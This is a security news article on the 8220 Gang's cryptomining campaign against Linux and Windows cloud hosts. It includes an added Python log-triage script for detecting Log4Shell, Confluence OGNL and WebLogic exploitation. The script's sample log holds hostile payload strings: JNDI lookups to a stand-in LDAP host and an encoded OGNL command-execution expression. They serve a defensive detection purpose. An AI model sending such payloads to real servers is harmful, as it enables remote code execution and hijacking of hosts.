Linux & Windows Users Beware: 8220 Gang’s Crypto Assault

Recently, a group of hackers from China known as the “8220 Gang” has significantly intensified its assaults on cloud infrastructure, targeting both Linux and Windows hosts with the aim of illicit cryptocurrency mining.

The latest campaign by this group, spanning from May 2023 to February 2024, marks a significant evolution in the tactics of 8220 and represents an escalated threat to global cloud security.

(Figure: downloading the payload deliver.cmd)

According to a recent report by Uptycs, these cybercriminals have shifted their focus towards exploiting well-known critical vulnerabilities, including CVE-2021-44228 (Log4Shell in Apache Log4j 2, CVSS 10) and CVE-2022-26134 (OGNL injection in Atlassian Confluence Server and Data Center, CVSS 9.8). The attackers gain a foothold by mass-scanning the internet for exposed instances of these applications and exploiting the vulnerabilities for unauthorized access; patching these two flaws, or at least keeping the affected services off the public internet, removes the group's primary entry points.

Meanwhile, one of the group’s recent attacks aimed to exploit an even older vulnerability in Oracle WebLogic Server, CVE-2017-3506, an XML deserialization flaw in the WLS Security component reachable through the wls-wsat web service. It allows the attackers to remotely execute arbitrary commands and paves the way for further malicious activity.
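Because all three initial-access vectors described above (the Log4Shell JNDI lookup, the Confluence OGNL expression in the request path, and the WebLogic wls-wsat endpoint) leave traces in ordinary web server access logs, a defender can triage for them without waiting for a full EDR deployment. The following is an added example written for this page, not code from Uptycs or from the 8220 Gang report: it parses Apache combined-format log lines, de-obfuscates nested Log4j lookups such as `${${lower:j}ndi:...}`, and tags each request with the CVE it resembles. The log lines, IP addresses and the `deliver.cmd`-style payload hosts are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format). These are
# illustrative, not traffic captured from any real 8220 Gang intrusion.
SAMPLE_LOG = """\
198.51.100.7 - - [12/Jan/2024:10:01:02 +0000] "GET /api/items HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Jan/2024:10:01:03 +0000] "GET /login HTTP/1.1" 200 311 "-" "${jndi:ldap://203.0.113.5:1389/a}"
198.51.100.7 - - [12/Jan/2024:10:01:04 +0000] "GET /login HTTP/1.1" 200 311 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/a}"
198.51.100.7 - - [12/Jan/2024:10:01:05 +0000] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29%7D/ HTTP/1.1" 302 0 "-" "curl/7.68"
198.51.100.7 - - [12/Jan/2024:10:01:06 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1203 "-" "python-requests/2.25"
"""

# Apache "combined" log format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d+) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Common Log4j lookup wrappers used to hide the literal string "jndi":
#   ${lower:j} / ${upper:J}  -> j
#   ${::-j} / ${env:NOPE:-j} -> j   (default-value syntax)
_LOOKUP_PATTERNS = [
    re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE),
    re.compile(r"\$\{[^{}]*?:-([^{}]*)\}"),
]


def normalize_lookups(s: str) -> str:
    """Collapse nested Log4j lookups until the string stops changing, so an
    obfuscated payload becomes a literal ${jndi:...} that is easy to match."""
    prev = None
    while prev != s:
        prev = s
        for pat in _LOOKUP_PATTERNS:
            s = pat.sub(lambda m: m.group(1), s)
    return s.lower()


def classify_request(line: str) -> list[str]:
    """Return the CVE identifiers whose exploitation pattern this request resembles."""
    m = LOG_RE.match(line)
    if not m:
        return []
    f = m.groupdict()
    hits: list[str] = []

    # 1. Log4Shell: a JNDI lookup can arrive in any logged, attacker-controlled
    #    field, so check the path, the Referer and the User-Agent.
    for value in (f["path"], f["referer"], f["ua"]):
        if "${jndi:" in normalize_lookups(unquote(value)):
            hits.append("CVE-2021-44228")
            break

    # 2. Confluence OGNL injection: the expression is URL-encoded into the
    #    request path itself, e.g. /${(#a=@org.apache...)}/ .
    path = unquote(f["path"])
    if "${" in path and ("@" in path or "#" in path):
        hits.append("CVE-2022-26134")

    # 3. WebLogic XMLDecoder RCE: a POST to the wls-wsat service. The access log
    #    cannot show the XML body, and the same endpoint is used by the later
    #    CVE-2017-10271 bypass, so treat this as a lead for body inspection.
    if f["method"] == "POST" and path.startswith("/wls-wsat/"):
        hits.append("CVE-2017-3506")

    return hits


def scan_log(text: str) -> list[tuple[int, str, list[str]]]:
    """Scan a log file's text; return (line number, source IP, matched CVEs) for each hit."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        hits = classify_request(line)
        if hits:
            ip = LOG_RE.match(line).group("ip")
            findings.append((lineno, ip, hits))
    return findings


if __name__ == "__main__":
    for lineno, ip, hits in scan_log(SAMPLE_LOG):
        print(f"line {lineno} from {ip}: {', '.join(hits)}")
```

Run against a real log, the source IPs that hit more than one of these patterns in quick succession are the ones to block first; an opportunistic scanner such as 8220 Gang's typically sprays all of its exploits at every host it finds, so a second match from the same address is a strong signal even when the first request returned an error.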

These attacks have a profound impact on the many organizations that rely on cloud infrastructure for their operations. The shift in the 8220 group's tactics and tooling signals an alarming advance in the capabilities of financially motivated cybercriminals and underscores the need for heightened vigilance and stronger security measures.

In their campaigns, the group employs a mix of tools: the Tsunami IRC bot for remote control of infected hosts, the XMRig miner to mine Monero, and the Masscan and Spirit scanners to find further targets, all used to conduct unauthorized cryptocurrency mining on compromised Linux and Windows hosts. Such activity consumes the victim's compute and degrades the performance and integrity of the affected systems, and the same foothold can be reused for other malicious purposes.

As the 8220 Gang continues to refine its strategies, cybersecurity specialists must remain one step ahead, actively identifying new threats and effectively countering them.

Organizations worldwide must prioritize cloud security and adopt comprehensive protection strategies to safeguard their digital assets against the 8220 group and similar malefactors.